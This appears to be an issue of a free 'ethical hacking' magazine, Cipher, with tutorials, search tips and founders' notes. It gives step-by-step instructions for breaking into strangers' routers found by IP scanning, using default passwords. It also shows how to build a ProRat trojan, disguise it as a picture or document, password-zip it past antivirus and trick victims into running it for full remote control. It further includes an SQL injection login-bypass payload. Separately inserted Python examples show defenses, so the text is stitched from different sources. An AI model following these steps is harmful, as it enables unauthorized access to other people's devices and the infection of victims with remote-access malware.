Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option Hosts with open ports only and click on OK. I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to go to Options instead of Tools.

Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.

Step-5: Now copy any of the IPs from the list, paste it in your browser's address bar and hit enter. A window will pop up asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password. Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below. If you do not succeed in gaining access, select another IP from the list and repeat step-5. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

SQL Injection

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organisations. It is perhaps one of the most common application layer attack techniques used today. Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites: they store the data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information and company statistics may all reside in a database and be accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to run your business day to day.

SQL Injection is the hacking technique which attempts to pass SQL commands through a web application for execution by the backend database. If inputs are not sanitised properly, web applications may be open to SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out. Features such as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications, which may be either purchased off-the-shelf or developed as bespoke programs, and all of them are susceptible to SQL Injection attacks.

SQL Injection: A Simple Example

Take a simple login page where a legitimate user enters his username and password combination to enter a secure area, view his personal details or post comments in a forum. When the legitimate user submits his details, an SQL query is generated from them and submitted to the database for verification. If valid, the user is allowed access. In other words, the web application that controls the login page communicates with the database through a series of planned commands so as to verify the username and password combination. On verification, the legitimate user is granted appropriate access.

Through SQL Injection, the hacker may input specifically crafted SQL commands with the intent of bypassing the login form barrier and seeing what lies behind it. This is only possible if the inputs are not properly sanitised (i.e. made safe) and are sent directly with the SQL query to the database. SQL Injection vulnerabilities give a hacker the means to communicate directly with the database. The technologies vulnerable to this attack are dynamic script languages including ASP, ASP.NET, PHP, JSP and CGI. All an attacker needs to perform an SQL Injection attack is a web browser, knowledge of SQL queries and creative guesswork at important table and field names. The sheer simplicity of SQL Injection has fuelled its popularity.

Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and other security mechanisms? Firewalls and similar intrusion detection mechanisms provide little or no defence against full-scale SQL Injection web attacks. Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your web application(s), generally over port 80/443. The web application has open access to the database in order to return (or update) the requested (or changed) information. In SQL Injection, the hacker uses SQL queries and creativity to get at the database of sensitive corporate data through the web application.

SQL, or Structured Query Language, is the computer language that allows you to store, manipulate and retrieve data stored in a relational database (a collection of tables which organise and structure data). SQL is, in fact, the only way that a web application (and its users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL and FileMaker Pro, all of which use SQL as their basic building block. SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and will in fact eliminate the table with the given name.

In the legitimate scenario of the login page example above, the SQL command planned for the web application may look like the following:

SELECT count(*) FROM users_list_table WHERE username='FIELD_USERNAME' AND password='FIELD_PASSWORD'

In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user against the combination it has already stored. Each web application is hard coded with the specific SQL queries it executes when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitised, a hacker may inject additional SQL commands that broaden the range of SQL the web application will execute, going beyond its original intended design and function. A hacker thus has a clear channel of communication (in layman's terms, a tunnel) to the database, irrespective of all the intrusion detection systems and network security equipment installed in front of the physical database server.

What is the impact of SQL Injection?

Once an attacker realises that a system is vulnerable to SQL Injection, he is able to inject SQL queries and commands through an input form field. This is equivalent to handing the attacker your database and allowing him to execute any SQL command, including DROP TABLE, against it! An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL Injection vulnerabilities lead to varying levels of data and system access for the attacker. It may be possible to manipulate existing queries, to UNION (used to select related information from two tables) arbitrary data, to use subselects, or to append additional queries. In some cases it may be possible to read or write files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it. Unfortunately the impact of SQL Injection is often only uncovered when the theft is discovered. Data is being unwittingly stolen through various hack attacks all the time, and the more expert hackers rarely get caught.

Is my database at risk to SQL Injection?

SQL Injection is one of the most common application layer attacks currently in use on the Internet. Despite the fact that it is relatively easy to protect against, a large number of web applications remain vulnerable. According to the Web Application Security Consortium (WASC), 9% of the total hacking incidents reported in the media until 27th July 2006 were due to SQL Injection. More recent data from our own research shows that about 50% of the websites we have scanned this year are susceptible to SQL Injection vulnerabilities. It may be difficult to answer the question whether your website and web applications are vulnerable to SQL Injection, especially if you are not a programmer or not the person who coded your web applications. Our experience leads us to believe that there is a significant chance that your data is already at risk from SQL Injection. Whether an attacker is able to see the data stored in the database or not really depends on how your website is coded to display the results of the queries sent. What is certain is that the attacker will be able to execute arbitrary SQL commands on the vulnerable system, either to compromise it or to obtain information. If your application is improperly coded, you run the risk of having your customer and company data compromised. What an attacker gains access to also depends on the level of security set by the database. The database could be set to allow only certain commands. Read access is normally enabled for use by web application back ends, so even if an attacker is not able to modify the system, he would still be able to read valuable information.

Example of a SQL Injection Attack

Here is a sample basic HTML form with two inputs, login and password:

<form method="post" action="http://localhost/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for login.asp to work is by building a database query that looks like this:

SELECT id FROM logins WHERE username = '$username' AND password = '$password'

If the variables $username and $password are taken directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password:

anything' OR 'x'='x

The query then becomes:

SELECT id FROM logins WHERE username = 'Joe' AND password = 'anything' OR 'x'='x'

As the inputs of the web application are not properly sanitised, the use of single quotes has turned the WHERE clause into a two-component condition. The 'x'='x' part is guaranteed to be true regardless of what the first part contains. This allows the attacker to bypass the login form without actually knowing a valid username/password combination!

How do I prevent SQL Injection attacks?

Firewalls and similar intrusion detection mechanisms provide little defence against full-scale web attacks. Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your database servers through web applications; isn't this what they were designed to do? Patching your servers, databases, programming languages and operating systems is critical, but is by no means the best way to prevent SQL Injection attacks.
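As an added illustration, not the article's own code, here is the login query above built the vulnerable way and then with bound parameters (the standard fix), run against an in-memory SQLite table seeded with constructed users.

```python
# Added example for this article (not code from the magazine): the login.asp
# query, built by string concatenation and then with bound parameters, run
# against an in-memory SQLite 'logins' table with constructed sample rows.
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Create the 'logins' table from the article and seed two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plain-text passwords only to mirror the article; real systems store salted hashes.
    conn.executemany("INSERT INTO logins (username, password) VALUES (?, ?)",
                     [("Joe", "s3cret"), ("Cipher", "hunter2")])
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """What login.asp sends when $username/$password are pasted into the SQL text."""
    return ("SELECT id FROM logins WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[int]]:
    """Return the matched (id,) or None; the input is part of the SQL, so a quote changes its meaning."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[int]]:
    """Same lookup with placeholders: the driver passes the values as data, never as SQL."""
    return conn.execute("SELECT id FROM logins WHERE username = ? AND password = ?",
                        (username, password)).fetchone()


BYPASS_PASSWORD = "anything' OR 'x'='x"     # the article's payload


def demo() -> dict:
    """Run the real password and the bypass string through both versions of the login."""
    conn = make_db()
    return {
        "query_seen_by_db": build_vulnerable_query("Joe", BYPASS_PASSWORD),
        "vulnerable_with_real_password": login_vulnerable(conn, "Joe", "s3cret"),
        "vulnerable_with_bypass": login_vulnerable(conn, "Joe", BYPASS_PASSWORD),
        "parameterized_with_real_password": login_parameterized(conn, "Joe", "s3cret"),
        "parameterized_with_bypass": login_parameterized(conn, "Joe", BYPASS_PASSWORD),
    }
```

In the vulnerable version the bypass string returns the first row of the table, so the attacker is logged in as whoever has id 1; in the parameterized version the same string is compared as a literal password and matches nothing.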

How to Hide the Partitions?

This trick is for all those people who want to hide tons of data on their box. If you have very important data on your hard drive, placed in some partition which you do not want anybody to see, then this trick is for you!!!
1. Click on Start > Run and type gpedit.msc
2. Now navigate through User Configuration > Administrative Templates > Windows Components > Windows Explorer
3. Double click on "Hide these specified drives in My Computer" and modify it accordingly.
4. Just below you will find another option, "Prevent access to drives from My Computer"; double click on this option and modify it accordingly.
5. To make the drives visible again, select "disable" by double clicking on the "Hide these specified drives in My Computer" option.
WARNING: Don't experiment with other options in gpedit.msc if you don't know exactly what you're doing.

Ultimate Google Search Tips


1. The best way to begin searching harder with Google is by clicking the Advanced Search link.
2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.
3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.
4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.
5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.
6. Save time: most of these advanced features are also available in Google's front page search box, as command line parameters.
7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire it looks for smoke AND fire.
8. To make Google search for smoke or fire, just type smoke OR fire
9. Instead of OR you can type the | symbol, like this: smoke | fire
10. Boolean connectors like AND and OR are case sensitive. They must be upper case.
11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire)
12. To look for phrases, put them in quotes: "there's no smoke without fire"
13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant
14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay.
15. Common words, like I, and, then and if are ignored by Google. These are called "stop words".
16. The plus operator makes sure stop words are included. Like: fish +and chips
17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for.
18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *
19. Search for a numerical range using the numrange operator. For example, search for Sony TV between 300 and 500 with the string Sony TV 300..500
20. Google recognizes 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.
21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetype:pdf
22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc
23. In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" onions filetype:doc
24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs
25. If you're looking for files rather than pages give index of as the intitle: parameter. It helps you find web and FTP directories.
26. The modifier inurl only searches the web address of a page: give inurl:spices a go.
27. Find live webcams by searching for: inurl:view/view.shtml
28. The modifier inanchor is very specific, only finding results in text used in page links.

29. Want to know how many links there are to a site? Try link:sitename, for example link:www.mozilla.org
30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com
31. The modifier info:site_name returns information about the specified page.
32. Alternatively, do a normal search then click the "Similar Pages" link next to a result.
33. Specify a site to search with the site: modifier, like this: search tips site:www.microsoft.com
34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites.
35. Access Google Directory, a database of handpicked and rated sites, at directory.google.com
36. The Boolean operators intitle and inurl work in Google Directory, as does OR.
37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk
38. Similarly, using "site:.com" will only return results from .com domains.
39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story.
40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail
41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example.
42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:<keyword>
43. The general search engine can get very specific indeed. Try movie:<name of film> to look for movie reviews.
44. The modifier film: works just as well!
45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing.
46. For a dedicated film search page, go to www.google.co.uk/movies
47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead.
48. Google really likes movies. Try typing director: The Dark Knight into the main search box.
49. For cast lists, try cast: name_of_film.

50. The modifier music: followed by a band, song or album returns music reviews.
51. Try searching for weather London; you'll get a full 4-day forecast.
52. There's also a built-in dictionary. Try define:<word> in the search box.
53. Google stores the content of old sites. You can search this cache directly with the syntax keyword cache:site_url
54. Alternatively, enter cache:site_url into Google's search box to be taken directly to the stored site.
55. No calculator handy? Use Google's built-in features. Try typing 12*15 and hitting "Google Search".
56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example.
57. It does currency conversion too. Try 200 pounds in euros
58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results.
59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.
60. Want to know how clever Google really is? Type 2476 in roman numerals, and then hit "Google Search"...
61. You can personalize your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account".
62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one.
63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds.
64. Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them with suitable site suggestions.
65. iGoogle allows you to theme your page too. Click "Select Theme" to change the default look.
66. Some iGoogle themes change with time... "Sweet Dreams" is a theme that turns from day to night as you browse.
67. Click "More" under "Try something new" to access a full list of Google sites and new features.
68. "Custom Search" enables you to create a branded Google search for your own site.
69. An active, useful service missing from the list is "Personalised Search", but you can access it via www.google.com/psearch when you're logged in.
70. This page lists searches you have recently made and is divided into categories. Clicking "pause" stops Google from recording your history.
71. Click "Trends" to see the sites you visit most, the terms you enter most often and links you've clicked on!
72. Personalised Search also includes a bookmark facility which enables you to save bookmarks online and access them from anywhere.
73. You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget.
74. Did you know you can search within your returned results? Scroll down to the bottom of the search results page to find the link.
75. Search locally by appending your postcode to the end of the query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers!
76. Looking for a map? Just add map to the end of your query, like this: Leeds map
77. Google finds images just as easily and lists them at the top when you add image to the end of your search.
78. Google Image Search recognizes faces: add &imgtype=face to the end of the returned URL in the location bar, then hit enter to filter out pictures that aren't people.
79. Keeping an eye on stocks? Type stocks: followed by the market ticker for the company and Google returns the data from Google Finance.
80. Enter the carrier and flight number in Google's main search box to return flight tracking information.
81. What time is it? Find out anywhere by typing time then the name of a place.
82. You may have noticed Google suggests alternate spellings for search terms; that's the built-in spell checker!
83. You can invoke the spell checker directly by using spell: followed by your keyword.
84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword.
85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results.
86. If your search has non-English results, click "Translate this Page" to see it in English.
87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries' sites to translate your query to.
88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste.
89. There's also a box that you can enter a direct URL into, translating to the chosen language.
90. Near the language tools link, you'll see "Search Preferences". This handy page is full of secret functionality.
91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like.
92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely.
93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too.
94. You can also set Google to open your search results in a new window.
95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist
96. Another useful, experimental search can be found at www.google.com/trends, where you can find the hottest search terms.
97. To compare the performance of two or more terms, enter them into the Trends search box separated by commas.
98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon
99. Perhaps the Swedish Chef from the Muppets is your role model instead? Check www.google.com/intl/xx-bork
100. Type answer to life, the universe and everything into Google. You may be surprised by the result.
101. It will also tell you the number of horns on a unicorn.


Eject your drives in and out infinitely

A simple VB Script will serve the purpose. Do the following:

1. Go to Start >> Run
2. Type Notepad and hit Enter
3. Now in Notepad type:

' Drive the CD/DVD tray through the Windows Media Player ActiveX control
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
' Only loop if the machine actually has an optical drive
If colCDROMs.Count >= 1 Then
    Do
        ' Eject (open) every tray
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next ' cdrom
        ' Calling Eject again closes the tray, so the drive goes in and out
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next ' cdrom
    Loop ' runs until the wscript.exe process is ended
End If

4. Go to File >> Save As...
5. Type Eject.vbs and click Save

How to use: just double click the saved file (Eject.vbs).

How to stop:
1. Restart the computer; this will stop the script.
2. Or open Task Manager, and in Processes search for wscript.exe and click End Process.

Making a Trojan Virus in ProRat v1.9


Here I will show you how to hack email account passwords using keyloggers and trojans. Here I am demonstrating using the ProRat trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors is the same. Please note that all these hacking tools and software are detected by antivirus. You have to uninstall or close your running antivirus first.

1. First of all, download ProRat v1.9. Once it is downloaded, right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro" (without quotation marks).
2. Open up the program. You should see the following:

3. Next we will create the ProRat Trojan server. Click on the Create button at the bottom. Choose Create ProRat Server.

4. Next put in your IP address so the server can connect to you. If you don't know your IP address, click on the little arrow to have it filled in for you automatically. Next put in your email so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.

5. Now open General Settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see, ProRat has the ability to disable the Windows firewall and hide itself from being displayed in the Task Manager.

Here is a quick overview of what they mean and which should be checked:

6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember, a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document, because that is a small file and it's easier to send to the people you need.

7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but an exe looks suspicious, so it would be smart to change it.

8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon, since my file is a text document.

9. After this, press Create Server; your server will be in the same folder as ProRat. A new file with the name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out, so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pen drive, or, if you have physical access to the system, go and run the file. You cannot send this file via email as "server.exe", because it will be detected as a trojan or virus. Password protect this file with ZIP and then email it. Once your victim downloads this ZIP file, ask him to unlock it using the ZIP password. When the victim double clicks on the file, he will be in your control.

11. Now I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address and port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victim's computer and have full control over it.

12. Now the hacker has a lot of options to choose from, as you can see on the right. He has access to all the victim's computer files; he can shut down his PC, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screenshot of his computer, and so much more. Below I'll show you a few examples.

13. Below is an image of what the hacker would see if he chooses to take a screenshot of the victim's screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan, so if the victim has an anti-virus program installed he most likely won't get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.
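The lure in steps 6 to 10 relies on a server executable carrying a document name, a document icon, and a password-protected ZIP wrapper that scanners cannot look inside. A defender can cut through the first two by classifying files on their bytes rather than their names: every Windows executable starts with the "MZ" DOS header, whose e_lfanew field at offset 0x3C points at the "PE\0\0" signature, regardless of what icon or extension it shows. The script below is an added example written for this article; it is not the magazine's code and not part of ProRat. The extension list and the sample files are constructed assumptions; the fake PE is just a header, enough to exercise the check, not a real program.

```python
"""Content-based check for executables disguised as documents (added example).

Classifies files by their bytes instead of their extension, and inspects ZIP
archives the same way, reporting encrypted entries (the password-protected
archive trick) as uninspectable.  All sample data is constructed inline.
"""
import io
import os
import struct
import zipfile

# Extensions Windows will run directly (assumed list, not from the article)
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}


def is_pe_executable(data: bytes) -> bool:
    """True if data starts with an 'MZ' header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew field
    return data[pe_offset:pe_offset + 4] == b"PE\0\0"


def classify_file(name: str, data: bytes) -> str:
    """Compare what the file name claims with what the bytes actually are."""
    ext = os.path.splitext(name)[1].lower()
    if is_pe_executable(data):
        # PE content behind a non-executable extension is exactly the disguise above
        return "executable" if ext in EXECUTABLE_EXTENSIONS else "executable-disguised"
    if ext in EXECUTABLE_EXTENSIONS:
        return "executable-extension"
    return "benign-looking"


def inspect_zip(zip_bytes: bytes) -> dict:
    """Map each archive entry to a verdict; encrypted entries cannot be read."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.flag_bits & 0x1:  # general-purpose bit 0 = entry is encrypted
                verdicts[info.filename] = "encrypted-uninspectable"
            else:
                verdicts[info.filename] = classify_file(info.filename, zf.read(info))
    return verdicts


def make_fake_pe() -> bytes:
    """Constructed 68-byte stand-in for a PE file: DOS header plus PE signature only."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> right after the DOS header
    return bytes(header) + b"PE\0\0"


def make_sample_zip() -> bytes:
    """Constructed archive: a 'picture' that is really PE content beside a real text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("holiday.jpg", make_fake_pe())
        zf.writestr("readme.txt", b"Just a note.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, verdict in inspect_zip(make_sample_zip()).items():
        print(f"{entry:12s} {verdict}")
```

Run as a script it prints one verdict per archive entry; "holiday.jpg" comes back as executable-disguised even though nothing about its name or icon would suggest it. An encrypted entry yields encrypted-uninspectable, which is itself the signal a mail gateway or user should act on: an archive that cannot be scanned is not safe merely because its contents are unknown.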


Words by Amiable
It was raining heavily and I was sipping my coffee with just nothing in my mind. Two guys came in with heavy and geek looks. Sitting behind me, they were talking something about technology and people. Suddenly one of them started talking loudly about the monopoly of magazines over the market. I guess he was not that financially sound to buy a costly magazine every month. As the blood rushed in my brain, I came up with a brilliant thought: why not give them free what they want? Why waste money on paper and support pollution? At the end of the day, it was done and I was working on how I can make this happen. I have seen and met people who are the best in their field but lack a medium to share their knowledge. Yes, Facebook played a role here. I love to share things. I started to contact people with extra terrestrial knowledge on Ethical Hacking and preparing a ground for them. It took a lot to convince them for sharing their content to the world. Adarsh was always with me, whether it's raining or the temperature is 40C. Some of my batch mates and juniors too came to help me with my quest. The magazine started to take shape: the ideas, content, people, knowledge, students, professionals, enthusiasts, bloggers and, moreover, sharing. Education is priceless; we cannot evaluate it in terms of money. Education is just like an emotion which should flow from one heart to the other. It should be free. I have always seen students reaching at the technical magazines; after reading it a bit and staring at the cost, they prefer not to purchase. Yes, money is the root here. We tried to eliminate that and we came across the Internet, the Guru of Gurus. It was planned that the magazine will be FREE and can be downloaded or read from our website (www.amiable.in). Moreover, the polluting cause was eliminated. Use of paper only harms the environment. Knowledge is a treasure; it increases if you share it. You will never lose a bit if you share your knowledge with the world. You will get experience day by day which will take you to more heights. I would like to request all the readers, students, bloggers, enthusiasts, professionals and researchers to please contribute towards the magazine. Share your knowledge and make this magazine always FREE. The contribution by any reader will be an honor for us to include in upcoming editions. Readers can contribute by mailing the content and contact details (blogs preferred) at content@amiable.in. Bloggers can mail a permalink of their blog. To maintain the quality of the content, it will go through some editing before finally publishing it in the magazine.

People share their views and reviews every day over the Internet. The Jasmine Revolution was a result of sharing. People are always a part of sharing and are learners. With this free magazine on Ethical Hacking, I am on a quest to educate a noob about the security of systems. I am sure one day our world will change. With this I present you CIPHER, a FREE Ethical Hacking Magazine.

Aakash Mishra
Founder

Adarsh Shukla, professionally a web developer and Co-founder of Amiable Technologies. From childhood times I love to read tech magazines, but because of cost being a factor I was not able to buy them so frequently, so I wanted to eliminate the factor of cost. Another thing that came to my mind was: why do we spend money in earning knowledge? Why today is knowledge getting dumped under cost? Why do we have to pay for knowledge? Why can't knowledge be free? I soon started finding the answer to these questions and I came to a conclusion: "Why to buy... when it's free." We decided to launch a free online magazine. I find a great pleasure in launching this magazine, Cipher. It is our first attempt to eliminate the factor of cost from knowledge, giving support to all those people who are not able to spend 150 bucks or so on buying tech magazines. Cipher is made for all those who are keen about Ethical Hacking and what's going on latest in the field of the Internet. Anyone who is interested to share his/her knowledge is kindly invited. Send your article to us at content@amiable.in and help us in making knowledge cost free. So kindly support us in making this magazine HUGE. "Your Support Is Our Demand."

Mayank Tripathi, a Graphic Designer and a part of Amiable Technologies. With the computer era soaring, there is a mammoth increase in its use and disuse. Examples are innumerable. I, as the designer of this magazine, was particularly curious about the concept of the magazine, i.e. Ethical Hacking. It is a very innovative field which made me work 24 * 7 on it. It gave me immense pleasure designing this magazine and I had some wonderful experiences of my life. Got to learn a lot. The task, no doubt, was difficult and time-consuming; it rather came as a challenge for me, but the passion and excitement to learn something new dominated it all and I let myself go making it. It was great fun working with such knowledgeable persons as Mr. Aakash Mishra and Mr. Adarsh Shukla, and with Amiable Technologies. The best part of such a knowledgeable magazine is that it is available for free. So, why to buy... when it's free? It also enables the magazine to enlarge its abilities to the masses. Cipher is a perfect package for all computer lovers. We have endeavored to give emphasis to both freshers and professionals, so that everybody is empowered to get a hold on it. I hope readers will like it...!


Contributing Artists
Mayank Tripathi
(mayank@amiable.in)

Anmol Kanchan
(anmol.kanchan@gmail.com)
